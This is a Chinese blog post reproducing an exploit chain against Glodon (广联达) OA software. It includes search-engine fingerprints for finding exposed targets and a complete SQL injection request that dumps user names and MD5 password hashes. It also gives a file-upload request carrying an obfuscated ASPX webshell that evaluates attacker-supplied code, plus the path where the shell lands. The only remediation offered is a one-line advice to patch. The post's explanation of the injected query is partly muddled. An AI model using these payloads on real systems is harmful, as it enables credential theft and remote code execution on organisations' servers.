广联达OA前台sql注入+后台文件上传漏洞复现分析

前言

最近看到广联达OA的前端sql注入和后端文件上传漏洞联动的poc

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。

广联达协同办公管理平台其实之前听得比较少,查了下公司资料,怪不得都是建工类的公司在用

资产特征

鹰图:web.body=“/Services/Identification/Server/”

fofa :“/Services/Identification/Server/“或者fid=”/yV4r5PdARKT4jaqLjJYqw==”

前台sql注入

下面先来看一下poc

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

根据这个poc可以看到,漏洞存在的路径为/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary,先来看看这个地址上面有什么
在这里插入图片描述
在这里插入图片描述
基本上就是报错提示缺少参数值,那么注入点应该就是这里了

可以看到poc的正文为
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
查询key值通过'就绕过了,执行后面的sql语句

这个查询语句是一个SQL语句,它的作用是从"T_ORG_USER"表中选择前1812行数据,并返回一个结果集。

具体来说,这个查询语句使用了UNION
ALL操作符来合并两个SELECT语句的结果集。第一个SELECT语句是固定的,它返回一个名为"dasdas"的列,并且该列的值为"&key=1’"。第二个SELECT语句使用了TOP
1812来限制结果集的行数,然后使用CONCAT函数将"F_CODE"和"F_PWD_MD5"两个字段的值连接起来作为结果集中的一列。

总结起来,这个查询语句的目的是从"T_ORG_USER"表中获取前1812行数据,并返回一个包含"dasdas"列和连接后的"F_CODE:F_PWD_MD5"列的结果集。

那么来看一下会有什么响应吧
在这里插入图片描述
可以看到在result的value里面,会将用户名和密码的md5值通过:连接回显出来

可以去解md5的平台将管理员的密码解出来,当然不是白解的
在这里插入图片描述
登陆进来后是下图
在这里插入图片描述

后台文件上传

同样先上poc

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 登录后的cookie

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

首先找一下漏洞位置,可以看到是一个附件上传的地方,并且会返回result,应该会返回地址
在这里插入图片描述
来看一下poc会响应什么
在这里插入图片描述

可以看到上传后的文件名为0fc5eab1-03f0-4249-882d-7533247532b0-123.aspx

那么这个文件上传到的地址为哪里?

/GTP/IM/Services/Group/Upload/0fc5eab1-03f0-4249-882d-7533247532b0-123.aspx
在这里插入图片描述
注意上传webshell的时候要传aspx马

解决办法

打补丁、升级版本
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
广联达 OA是一款便捷高效的办公管理软件,其中的文件上传功能可以帮助用户快速、方便地上传文件。使用广联达 OA进行文件上传的步骤如下: 1. 打开广联达 OA软件,登陆自己的账号。 2. 在软件的界面中,找到菜单栏或工具栏中的文件上传选项,点击进入文件上传界面。 3. 在文件上传界面中,用户可以选择需要上传的文件。可以使用自己电脑中的文件浏览功能,或者直接将文件拖拽到上传区域。 4. 选择需要上传的文件后,点击确认或上传按钮,等待文件上传的过程。上传速度会根据文件大小和网络状况而有所不同。 5. 当文件上传完成后,用户可以使用广联达 OA的其他功能继续进行工作,或者在需要时访问已上传的文件。 广联达 OA文件上传功能的特点是简单易用,用户只需几步即可完成文件上传操作。另外,广联达 OA还提供了文件管理功能,用户可以在上传后对文件进行分类、排序、搜索等管理操作,使文件的查找和使用更加方便。 需要注意的是,由于文件上传涉及到网络传输,用户在上传时需要确保网络连接稳定,以免出现上传失败或文件损坏等情况。另外,为了保护文件的安全,用户在上传时可以选择设置文件访问权限,确保只有授权人员可以查看和使用文件。 总之,广联达 OA文件上传功能能够满足用户在办公过程中的文件管理需求,使文件的传输和管理变得更加简单高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值